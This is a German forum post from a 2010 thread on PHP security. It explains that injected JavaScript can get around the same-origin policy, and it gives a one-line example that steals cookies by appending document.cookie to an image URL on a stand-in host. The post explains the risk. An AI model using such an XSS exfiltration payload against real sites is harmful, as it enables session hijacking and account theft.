 |
 |
 |
 |
 |
|
Registriert seit: 11. Aug 2003 Ort: München 6.537 Beiträge |
#24
AW: PHP - sind hier "Sicherheitsexperten" an Board?
30. Jun 2010, 06:28
"Neuere" Browser lassen ja z.B. absichtlich keine Server(URL) übergreifenden JavaScript-Zugriffe zu.
aber so kann man etwas in den "Kontext" der fremden Seite einschmuggeln und es hätte dann da vollen Zugriff.
Code:
Und da geht deine Same-Origin-Policy zur Tuer raus - Bilder sind naemlich vollkommen OK. Kann sein dass manche Heuristiken das mittlerweile abgreifen, da gibts aber noch zig Wege um Content an eine andere Seite zu uebermitteln sobald man mal das JS reingekriegt hat.
var foo = new Img(); foo.source='http://foo.baz/'+document.cookie;
Greetz alcaeus
Andreas B.
Die Mutter der Dummen ist immer schwanger. Ein Portal für Informatik-Studenten:  www.infler.de
|
Zitat
|
ForumregelnEs ist dir nicht erlaubt, neue Themen zu verfassen.
Es ist dir nicht erlaubt, auf Beiträge zu antworten.
Es ist dir nicht erlaubt, Anhänge hochzuladen.
Es ist dir nicht erlaubt, deine Beiträge zu bearbeiten.
BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus. Trackbacks are an
Pingbacks are an
Refbacks are aus
|
|
Baum-Darstellung
